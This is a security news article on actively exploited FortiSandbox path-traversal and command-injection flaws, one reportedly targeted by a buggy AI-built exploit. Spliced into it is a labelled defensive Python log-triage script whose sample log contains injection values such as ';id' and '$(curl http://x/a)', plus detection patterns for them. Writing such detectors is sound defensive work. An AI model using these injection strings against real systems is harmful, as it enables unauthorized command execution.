Three FortiSandbox flaws, including one patched last week, are being actively exploited, highlighting the shrinking window for defenders.

Cybersecurity firm Defused Cyber confirmed it has seen active exploitation of three vulnerabilities in Fortinet FortiSandbox within a 24-hour window. Two of them had patches available since April. The third was fixed last week, which apparently was not fast enough.

“We are observing exploitation of multiple Fortinet FortiSandbox vulnerabilities during the past 24 hours, including: CVE-2026-39813 (no previous recorded exploitation), CVE-2026-39808, CVE-2026-25089 (vibecoded, likely faulty exploit). Per our research a working exploit for… pic.twitter.com/obZTugupWT” — Defused (@DefusedCyber) June 15, 2026

CVE-2026-39813 (CVSS score: 9.1) is a path traversal vulnerability in the FortiSandbox JRPC API that could allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests. Its twin, CVE-2026-39808 (CVSS score: 9.8), is also rated critical and is an OS command injection flaw reachable over the same attack vector: crafted HTTP requests from an unauthenticated attacker, leading to unauthorized command execution. Both had patches available for two months.

The third flaw, CVE-2026-25089, hits a broader surface. Fortinet described it as an operating system command injection affecting the FortiSandbox, FortiSandbox Cloud and FortiSandbox PaaS web UI that could allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests. The patch dropped last week, yet it is already being used in the wild.

“An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in FortiSandbox, FortiSandbox Cloud and FortiSandbox PaaS WEB UI may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests.” reads the advisory.

Here is where it gets interesting.
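All three issues described above share one trait: they are reached with crafted HTTP requests from an unauthenticated client, which is exactly what a defender can hunt for in an appliance's web access logs while the patch is being scheduled. What follows is an added example, not code from Fortinet, Defused Cyber or this article: a small Python triage script that parses combined-format access-log lines, percent-decodes the request target until it is stable (so encoded traversal such as %2e%2e%2f or a double-encoded %252e is not missed), and flags two request shapes, a directory-walking sequence in the URL path and shell metacharacters inside a query parameter value. The log lines, the /jrpc/... and /ui/scan paths and the host parameter are all constructed for the example; they are not the real vulnerable endpoints or the actual exploit payloads, which the article does not disclose.

```python
"""Triage web access logs for path-traversal and OS command injection attempts.

Added example. The sample log lines and endpoint paths below are constructed
and are NOT the real FortiSandbox endpoints or exploit payloads.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines; /jrpc/... and /ui/scan are hypothetical paths.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jun/2026:10:01:02 +0000] "GET /jrpc/status HTTP/1.1" 200 512
198.51.100.7 - - [15/Jun/2026:10:01:09 +0000] "POST /jrpc/../../api/login HTTP/1.1" 200 88
198.51.100.7 - - [15/Jun/2026:10:01:10 +0000] "POST /jrpc/%2e%2e%2f%2e%2e%2fapi/login HTTP/1.1" 200 88
203.0.113.9 - - [15/Jun/2026:10:02:33 +0000] "GET /ui/scan?host=1.2.3.4;id HTTP/1.1" 500 0
203.0.113.9 - - [15/Jun/2026:10:02:40 +0000] "GET /ui/scan?host=$(curl%20http://x/a) HTTP/1.1" 500 0
10.0.0.6 - - [15/Jun/2026:10:03:00 +0000] "GET /ui/scan?host=1.2.3.4 HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." segment bounded by slashes or backslashes: anything that walks up a directory.
TRAVERSAL_RE = re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)')
# Metacharacters that chain or substitute commands when a value lands in a shell.
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(|&&')


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the list of rules a request target trips (empty list if it looks clean)."""
    parts = urlsplit(target)          # urlsplit does not collapse dot segments
    rules = []
    if TRAVERSAL_RE.search(decode_fully(parts.path)):
        rules.append("path-traversal")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META_RE.search(decode_fully(value)):
            rules.append(f"command-injection:{key}")
    return rules


def analyze_log(text):
    """Parse CLF lines and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a real pipeline would count and report these
        rules = classify_request(m["target"])
        if rules:
            findings.append({
                "ip": m["ip"],
                "method": m["method"],
                "target": m["target"],
                "status": int(m["status"]),
                "rules": rules,
            })
    return findings


def source_ips(findings):
    """Distinct source addresses behind the findings, for blocking or pivoting."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        # A 2xx on a traversal or injection attempt deserves a closer look than a 4xx/5xx.
        print(f"{f['ip']:15} {f['status']} {', '.join(f['rules']):25} {f['method']} {f['target']}")
    print("sources:", source_ips(hits))
```

On the constructed sample the script flags the two traversal requests from 198.51.100.7 (both answered with 200, which is the alarming case) and the two host= values from 203.0.113.9 carrying a command separator and a command substitution; the two ordinary requests pass. Treat the patterns as a starting point for a hunt rather than a signature: legitimate traffic rarely contains ../ in a path or $( in a parameter, but any rule like this needs tuning against the appliance's real traffic before it feeds an alert.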
The exploit for CVE-2026-25089 appears to have been built with AI assistance, and it shows, not in a good way. Defused Cyber researchers speculate that the exploit not only bears signs of having been developed with an artificial intelligence (AI) model, but is also bugged. No working exploit for the vulnerability has been publicly disclosed. So attackers are throwing broken, AI-generated code at unpatched systems and still finding traction, which says something about the state of patch management out there.

Fortinet gear keeps drawing this kind of attention. In April, the company pushed out-of-band patches for a critical flaw in FortiClient EMS, tracked as CVE-2026-35616 (CVSS score: 9.1), which was already being exploited before the fix arrived. If you run anything in the Fortinet stack, the window between disclosure and active exploitation has become uncomfortably short: patch cycles once measured in weeks are now measured in days.

Pierluigi Paganini (SecurityAffairs – hacking, Fortinet)